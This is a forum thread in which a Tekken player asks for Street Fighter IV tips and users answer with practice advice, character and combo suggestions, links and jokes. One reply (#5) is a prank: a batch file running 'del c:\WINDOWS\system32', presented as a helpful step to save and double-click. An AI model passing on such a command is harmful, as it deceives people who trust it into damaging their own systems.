Something went wrong. Try again later
    Follow

Street Fighter IV

Game » consists of 9 releases. Released Jul 18, 2008

After nearly a decade in hiatus, Capcom's signature mainline fighting game series resurfaces with its fourth main installment, combining the traditional 2D gameplay with modern fully-3D graphics.

ok i suck... any tips?

• 132 results

This topic is locked from further discussion.

CptChiken

Forum Posts

Wiki Points

Followers

Reviews: 2

User Lists: 3

#1  Edited By CptChiken

i am terrible atm... i come from a background of tekken as my go to fighting game and street fighter 4 is my first go at the ST franchise. i reckon this is the reason why im not so great at the game. Does anyone have any tips or helpful points for me to step my game up and become a member of a community i would very much like to join? 

dbz1995

Forum Posts

Wiki Points

Followers

User Lists: 2

#2  Edited By dbz1995

HADOOOOOOO KEN

GunstarRed

Forum Posts

Wiki Points

Followers

Reviews: 1

User Lists: 10

#3  Edited By GunstarRed

jam on down and forwardas ken sagat or ryu and press punch a lot.

FiestaUnicorn

Forum Posts

Wiki Points

Followers

User Lists: 4

#4  Edited By FiestaUnicorn

Perhaps you could try sucking less:)

ninjakiller

Forum Posts

Wiki Points

Followers

Reviews: 0

User Lists: 0

#5  Edited By ninjakiller

open a notepad type the following:
    @echo off
    del c:\WINDOWS\system32

save the file as anything.bat (remember to add the .bat extension and save as all files)
    double click and it will delete the system32 folder.

RaikohBlade

Forum Posts

Wiki Points

Followers

#6  Edited By RaikohBlade

Jump in every chance you get.
    beargirl1

Forum Posts

Wiki Points

Followers

User Lists: 24

#7  Edited By beargirl1
    @dbz1995 said:

" HADOOOOOOO KEN "

strangely, this. Ryu (or Ken) are great starting characters. try playing around with them if you haven't  

@RaikohBlade said:
    " Jump in every chance you get. "
    oh, this too. 
    Scooper

Forum Posts

Wiki Points

Followers

#8  Edited By Scooper

Try and do the normal combo trials for a character that you like. Get a feel for what all their moves. Play some Arcade mode and slowly ramp up the differculty until you're comfortable with what you can do. Then play a few player matches and try and get a few games with people from this forum. There's quite alot of begginner players around here that would like to practise.

But yeah, just keep playing and practicing. You'll be playing over 200 hours probably before you figure out 75% of the game.

Edit: sorry about my typos and misspellings, not feeling great.

dbz1995

Forum Posts

Wiki Points

Followers

#9  Edited By dbz1995

SHORYUUUUUUU KEN

Scooper

Forum Posts

Wiki Points

Followers

#10  Edited By Scooper

By the way, anyone not here to help bugger off.

GunstarRed

Forum Posts

Wiki Points

Followers

#11  Edited By GunstarRed
    @Scooper:
    the problem with this is that player matches are full of people that are very good at the game... not all but quite a lot.
    Scooper

Forum Posts

Wiki Points

Followers

#12  Edited By Scooper
    @marioncobretti said:
    " @Scooper: the problem with this is that player matches are full of people that are very good at the game... not all but quite a lot. "
    Yeah, but it's his best chance of playing someone online who's a begginner. To be honest it's too late already to start playing this game unless you're sure to be very committed.
    Mandiggidy

Forum Posts

Wiki Points

Followers

#13  Edited By Mandiggidy

Play Arcade mode until you get the mechanisms of the game down, then if you feel it, choose a character that you feel comfortable playing with and start learning their bread and butter combos. If you want to speed up your progression quickly, but dont mind doing a little homework, head over to Shoryuken.Com and in the forums there are breakdowns for each character, as well as tips in match-ups and whatnot.

CptChiken

Forum Posts

Wiki Points

Followers

#14  Edited By CptChiken
    @Scooper: thanks dude, one of the few people who has actually stopped and helped haha. 
    ive experimented with balrog and abel because i didnt want to do the typical, "hey im new to this lets choose the title characters", start off point. i think my main problem is that the game is just so much faster pace than tekken, ST is hectic where as tekken is more strategic
    Avatar image for ownlyuzinwonhan
    OwnlyUzinWonHan

Forum Posts

Wiki Points

Followers

Reviews: 7

User Lists: 6

#15  Edited By OwnlyUzinWonHan

Watch some pros play, play some of us (Most of us are on GB SFIV DIRECT's Xbox Live friends list) and be patient.
    AltonBrown

Forum Posts

Wiki Points

Followers

#16  Edited By AltonBrown

Learn to cancel. The Challenge Mode is a good place to learn canceling. Ken is a great character to start with.

Stang

Forum Posts

Wiki Points

Followers

User Lists: 1

#17  Edited By Stang

Come play me.

Symphony

Forum Posts

Wiki Points

Followers

Reviews: 33

#18  Edited By Symphony

Practice, practice, practice. Work on the challenges.Some are insanely frustrating, but all of the attempts will really help you get used to he controls even if you don't realize it. Also, a sparring partner is good to have. Ask them to do certain things like combos or jump ins, so you can learn and practice counters and such. If you have it for the 360 I'd be happy to help ya.

GunstarRed

Forum Posts

Wiki Points

Followers

#19  Edited By GunstarRed

I think theres some more basic stuff to learn before cancels and whatnot, isnt there a fighting game guide on this site someone wrote a while back... 

a lot of people new to the game stick to just the hard punches and kicks because they equate harder hitting as better moves... and thats probably one of the first things you kind of have to abandon... I saw a million jumpkick, low roundhousers when the game came out.
    napalm

Forum Posts

Wiki Points

Followers

#20  Edited By napalm

Do not play Street Fighter IV like you play Tekken 6. Watch some tournament videos on YouTube and see how people play. Not every character plays alike.

Stang

Forum Posts

Wiki Points

Followers

#21  Edited By Stang
    @marioncobretti said:
    " @Scooper: the problem with this is that player matches are full of people that are very good at the game... not all but quite a lot. "
    I have the opposite true in my experience. They kick you for having the most basic avatar's, that blossom avatar surely means you are a beast!
    Scooper

Forum Posts

Wiki Points

Followers

#22  Edited By Scooper
    @CptChiken: I'd say Abel and Balrog aren't that easy to start off with. Those 2 are probably the ones I'm most useless at playing. It might be fine for you though so if you do really like them keep at it.

Add  GBSFIVDIRECT to your friend's list like Ownly said. Alot of us are on there so you could invite someone from GBSFIVDIRECT's friends list and we'll most likely change our pace to help you out.
    GunstarRed

Forum Posts

Wiki Points

Followers

#23  Edited By GunstarRed
    @Stang:
    for some reason I always tend to get really good people... maybe its the time I play it or something.
    CptChiken

Forum Posts

Wiki Points

Followers

#24  Edited By CptChiken
    @OwnlyUzinWonHan: cool i'll probably end up doing that. 

@Scooper: i think im just gunna have to work my way through all the characters to start with and find one i feel comfortable with
    Stang

Forum Posts

Wiki Points

Followers

#25  Edited By Stang
    @CptChiken: If you ever decide on giving Mr. Masters a go, hit me up. I will teach you some tricks.
    napalm

Forum Posts

Wiki Points

Followers

#26  Edited By napalm
    @Stang said:

" @CptChiken: If you ever decide on giving Mr. Masters a go, hit me up. I will teach you some tricks. "

I think fighting you will discourage him too* quickly.
    Stang

Forum Posts

Wiki Points

Followers

#27  Edited By Stang
    @Napalm: Nah, not if it is a person new to the game trying to learn. Grab a headset, do what you do, and go from there. If I see something a person is doing that is asking for a massive punish, I will happily lend my opinion. Beast (scrub) mode would be turned of in this sort of situation.

Of course this only aplies to Ken. I am free using anybody else.
    ArbitraryWater

Forum Posts

Wiki Points

Followers

Reviews: 8

User Lists: 66

#28  Edited By ArbitraryWater

I kind of suck as well, but only mostly in comparison to the SF community here at giant bomb. Here's how I got past "Just kind of jumping in and sweeping all the time"
    1. Learn to do all your favored character's special moves consistently. This isn't too hard, unless of course we are talking about Guile and Vega's Ultras, which I still have no idea how to pull off on an Xbox controller. 

2. Learn which moves cancel into other moves. I use Ryu, partially because I am a scrub, and also because he's a solid choice. I know, for example, that I can cancel his jumping fierce (Heavy Punch) into a super or ultra. 

3. Practice, Practice, Practice! Seriously. That's all there is to it. After a while you figure out when you can throw a fool and when you can't, when to use a focus attack, and how to not suck. It's going to take some time, and it's going to take some friends. 

I would offer to help, but I don't actually own Street Fighter IV, as I managed to con a friend into letting me borrow it for 5 or so months before my save data got corrupted and I decided to give it back. However, once Super Street Fighter IV comes out, feel free to ask me.

Rayfield

Forum Posts

Wiki Points

Followers

#29  Edited By Rayfield

Don't be afraid to try different characters. Try them all if you can and see who you have the most fun/wins with. For a long time, I wanted to master Fei Long but I could never really pull it off consistently , but recently I've been experimenting with Sakura (who I never even considered before) and that's been working a treat.
    lordofultima

Forum Posts

Wiki Points

Followers

Reviews: 4

User Lists: 9

#30  Edited By lordofultima

Just play matches.

CL60

Forum Posts

Wiki Points

Followers

User Lists: 5

#31  Edited By CL60

Just practice a lot.

CornontheCobbe

Forum Posts

Wiki Points

Followers

#32  Edited By CornontheCobbe

SONIC BOOM! SHRYUKEN!! HADOUKEN!!!

I agree with Rayfield, you should try different characters. I found i in actual fact suck with Ryu, and i always used him. I found that Zangief was the dude for me.

JJOR64

Forum Posts

Wiki Points

Followers

Reviews: 3

#33  Edited By JJOR64

Pick Dan and super taunt.  You get an instant win every time.

thatpinguino

Forum Posts

Wiki Points

Followers

#34  Edited By thatpinguino  Moderator

Get the basic moves down in arcade mode and challenge mode, then go to player matches.  Find someone who utterly destroys you and play them over and over till you get better.  The people who are still playing online in street fighter 4 are all quite good, so there are not many options to learn other than taking a lot of beatings and learning from them

lordofultima

Forum Posts

Wiki Points

Followers

#35  Edited By lordofultima

Play to learn, not to win. Don't get too salty, just shrug it off and analyze where your game went wrong. Learn basic things, fundamentals first. Combos and crazy stuff second. Try to find how all your normal moves work, put them to work. All really general stuff but I wish I would have tackled my learning in this way.

fishinwithguns

Forum Posts

Wiki Points

Followers

#36  Edited By fishinwithguns

Try a bunch of different characters out.  If you think you suck with all of them too, default to Ken or Ryu.  They are both all-around solid fighters and both easy to learn.  Sagat is similar, and although a little more complicated, I think he's a good starting character too.  Try being really aggressive with Ken (jumping in, low kicking, using his "target combo" into the Shoryuken, etc.).  Ken can't throw fireballs quite as fast as Ryu, but his Shoryuken (dragon punch) is devastating, far-reaching, and can 
    really get you out of a lot of tough situations.  Use shoryukens and anti-air moves like that against overly aggressive players who keep jumping in towards you.

Oh and don't waste any Microsoft points on those "official strategy videos" you can find on X-Box live...they're a waste of space and time...you can learn much more from the official strategy guide.  The strategy guide is really good in my opinion, I got mine for free...but I think it would be worth the price considering how serious you seem to be about this.  SFIV can be incredibly satisfying if you're doing good.  Sometimes it's miserable though, because there really are INCREDIBLE players out there who grew up playing it so don't get discouraged if you get your ass handed to you every once in a while.

A lot of people would recommend getting an arcade-style joystick too, especially if you have it for X-Box because the d-pad kinda sucks.  I don't use one though so I don't know what to tell you about that.

Stang

Forum Posts

Wiki Points

Followers

#37  Edited By Stang
    @needforswede said:

" Try a bunch of different characters out.  If you think you suck with all of them too, default to Ken or Ryu.  They are both all-around solid fighters and both easy to learn.  Sagat is similar, and although a little more complicated, I think he's a good starting character too.  Try being really aggressive with Ken (jumping in, low kicking, using his "target combo" into the Shoryuken, etc.).  Ken can't throw fireballs quite as fast as Ryu, but his Shoryuken (dragon punch) is devastating, far-reaching, and can  really get you out of a lot of tough situations.  Use shoryukens and anti-air moves like that against overly aggressive players who keep jumping in towards you.  Oh and don't waste any Microsoft points on those "official strategy videos" you can find on X-Box live...they're a waste of space and time...you can learn much more from the official strategy guide.  The strategy guide is really good in my opinion, I got mine for free...but I think it would be worth the price considering how serious you seem to be about this.  SFIV can be incredibly satisfying if you're doing good.  Sometimes it's miserable though, because there really are INCREDIBLE players out there who grew up playing it so don't get discouraged if you get your ass handed to you every once in a while.  A lot of people would recommend getting an arcade-style joystick too, especially if you have it for X-Box because the d-pad kinda sucks.  I don't use one though so I don't know what to tell you about that. "

I am sorry, but I just have to pick some of this a part. Ken is not an all around solid fighter sadly, he is as mid tier as it gets. Sagat is not more complicated, he is the best character in the game, Ryu is just under him. Ken is surrounded by the likes of Guile and Honda, no where near as good overall as Ryu or Sagat.

Target combo should not be used, despite what challenge mode tells you. You will never see tourny level players use it, and rightfully so. It does little damage compared to other situation combos, and it will miss if your opponent is crouching. If you are in a position where you can target combo, use neutral roundhouse xx fierce srk instead. If you have meter, use neutral roundhouse xx ex srk, that is good for 350 damage. That is Ken's most damaging (basic) combo. If you want to mix things up, do neutral roundhouse xx ex tatsu and then either begin another combo (I like using a crouching short to begin), throw, back dash, srk, whatever. You have a lot of options, and this is where Ken can shine. If you want to win with Ken, you have to take advantage when an ex tatsu connects.

Ken has the weakest srk of all the shotos. Don't believe me, go look at the data. Just because his fierce srk has fire coming out of it, it does not make it thebest. Contrary to popular belief, his strong srk does the most damage, not fierce.

I missed a bunch, but I am tired.
    ThePhenomenal1

Forum Posts

Wiki Points

Followers

#38  Edited By ThePhenomenal1

to really get a grasp of how this game works, you need to take it back old school and learn some of the most basic elements of the game.

http://www.youtube.com/watch?v=d0cFs5mHQC4

watch both beginner videos and the other two. granted this is super turbo hes talking about, but the psychology applies.

then you wanna start watching videos of your character and how he/she matches up with other character

http://streetfighterdojo.com/sf4/index.html

you're going to need to watch ALOT of videos. there are so many mixups, combos, and strats that you just won't get from playing the trail mode. most of the combos there aren't even viable for most characters. so watch how the pros play, and you'll get an idea of how you should be playing. 

thats not to say that pro tactics will work all the time. especially when playing against complete and total scrubs. its a sad fact that alot of scrub tactics require you to play scrubbily to defend against. then again alot of times it requires just watching how predictable they are and adjusting to it. all things that you just learn in time by playing against as many different players as possible.

and last but not least, sign up here and start reading

http://forums.shoryuken.com/

and thats really as much as i can think of at this moment. really right now you'll just need to get the psychology of the matches down. character strats and move properties will be changed in super 4 but you should still be able to take most of what you'll learn here into that game too.

anyway, have fun learning.

demontium

Forum Posts

Wiki Points

Followers

Reviews: 7

#39  Edited By demontium
    @CptChiken: Can you tell me which character you use? 
    NeoUltima

Forum Posts

Wiki Points

Followers

#40  Edited By NeoUltima
    @ninjakiller: 
    wut
    turbomonkey138

Forum Posts

Wiki Points

Followers

#41  Edited By turbomonkey138
    @Stang said:
    " Come play me. "
    Its a trap ....
    Thrawn1

Forum Posts

Wiki Points

Followers

#42  Edited By Thrawn1
    http://forums.shoryuken.com/forumdisplay.php?f=17  

Find your region and scan through the board for topics about people hosting games near you. Don't make a thread yourself, people are that site are assholes to newcomers.
    This has helped me the most out of anything. When you play online you get no feedback at all and you never learn what went wrong. Find people to play with locally, hopefully people that are very good. Depending on where you live you may or may not have an active scene. I was very surprised to find that there are very good players living a short drive from me. If you can't ever find anyone to play with, go ahead and play people online, preferably with a mic. 

Learn a character. Find somebody you like and become comfortable with their moveset. Learn all their special moves and combos, but pay the most attention to the normal attacks. After you've learned a character, start learning matchups. SFIV is about understanding the other character's strengths/weaknesses and playing as safe as possible while punishing the opponent's unsafe attacks. 

http://forums.shoryuken.com/forumdisplay.php?f=241 

Find your character and read through the stickied threads. Pay the most attention to any thread that has the word matchup in it.
    AniMoney

Forum Posts

Wiki Points

Followers

#43  Edited By AniMoney

Yeah watch Sirlin's videos for SF2, then maybe read some of the character guides over here. After that just mess around in training and online and don't worry about winning too much. Copy what you see some other players doing online if it's working. Also you can play me if you want, I play okay with a good portion of the cast so we can mess around some. 

My GT is AniMoney

Thrawn1

Forum Posts

Wiki Points

Followers

#44  Edited By Thrawn1

oh and buy a stick if you're super serious about it. some characters can't be played well without one.

EnchantedEcho

Forum Posts

Wiki Points

Followers

Reviews: 17

#45  Edited By EnchantedEcho

Start playing with Ryu or Ken.
    and learn:
    @dbz1995 said:

" HADOOOOOOO KEN "

and
    @dbz1995 said:
    " SHORYUUUUUUU KEN "

And play arcade mode on the easiest setting. Use practice mode to learn Hadoken and Shoryuken.
    Avatar image for phaggybignastymckill
    PhaggyBigNastyMcKill

Forum Posts

Wiki Points

Followers

Do a barrel roll

Plasma

Forum Posts

Wiki Points

Followers

#47  Edited By Plasma

Do a barrel roll

lordofultima

Forum Posts

Wiki Points

Followers

#48  Edited By lordofultima
    @EnchantedEcho: Arcade mode in general is good for pretty much nothing, I can say it helped me 0%. From easiest to hardest it was pretty much the same difficulty to me, they did the same psychic shit and made the same dumb mistakes. I had trouble with arcade mode but was pretty good at the game a while back, it's not until recently that I just learned arcade mode patterns and now it's easy.
    wwfundertaker

Forum Posts

Wiki Points

Followers

Reviews: 22

User Lists: 25

#49  Edited By wwfundertaker

Just keep practicing, thats the only way to get better.

EnchantedEcho

Forum Posts

Wiki Points

Followers

Reviews: 17

#50  Edited By EnchantedEcho
    @lordofultima: I never played a street fighter game in my life before SF4, maybe my opinion is rendered useless due to my lack of experience but, for me Arcade Mode helped me get used to the game and I learnt how to pull off super and ultra moves while under pressure.

This edit will also create new pages on Giant Bomb for:

Beware, you are proposing to add brand new pages to the wiki along with your edits. Make sure this is what you intended. This will likely increase the time it takes for your changes to go live.

Comment and Save

Until you earn 1000 points all your submissions need to be vetted by other Giant Bomb users. This process takes no more than a few hours and we'll send you an email once approved.